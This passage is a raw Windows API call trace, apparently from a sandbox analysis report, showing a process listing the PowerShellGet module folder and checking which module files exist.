Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0182.262] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b68a0 [0182.262] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.262] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0182.262] FindNextFileW (in: hFindFile=0x1a9b68a0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0182.263] FindClose (in: hFindFile=0x1a9b68a0 | out: hFindFile=0x1a9b68a0) returned 1 [0182.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9a0) returned 1 [0182.263] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0182.263] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0182.263] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7dd640 | out: lpFindFileData=0x1b7dd640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6ae0 [0182.264] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.264] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.265] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0182.265] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0182.266] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0182.266] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0182.266] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0182.266] FindClose (in: hFindFile=0x1a9b6ae0 | out: hFindFile=0x1a9b6ae0) returned 1 [0182.266] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8f0) returned 1 [0182.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0182.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0182.267] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7dd640 | out: lpFindFileData=0x1b7dd640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6900 [0182.267] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.268] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.268] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0182.268] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0182.269] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0182.269] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0182.269] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.270] FindClose (in: hFindFile=0x1a9b6900 | out: hFindFile=0x1a9b6900) returned 1 [0182.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8f0) returned 1 [0182.270] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0182.270] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0182.270] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddab0 | out: lpFileInformation=0x1b7ddab0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.271] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0182.271] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0182.271] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7dd6a0 | out: lpFindFileData=0x1b7dd6a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b67e0 [0182.272] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.272] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0182.272] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0182.309] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0182.309] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0182.310] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0182.310] FindNextFileW (in: hFindFile=0x1a9b67e0, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0182.310] FindClose (in: hFindFile=0x1a9b67e0 | out: hFindFile=0x1a9b67e0) returned 1 [0182.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd950) returned 1 [0182.311] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0182.311] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0182.311] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0182.312] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0182.312] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0182.312] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7dd720, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0182.312] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc40 | out: lpFileInformation=0x1b7ddc40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.312] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0182.313] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0182.313] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7dd830 | out: lpFindFileData=0x1b7dd830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6ae0 [0182.313] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.313] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0182.314] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.314] FindClose (in: hFindFile=0x1a9b6ae0 | out: hFindFile=0x1a9b6ae0) returned 1 [0182.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddae0) returned 1 [0182.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddaa0) returned 1 [0182.314] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0182.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddbd0) returned 1 [0182.314] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddcb0 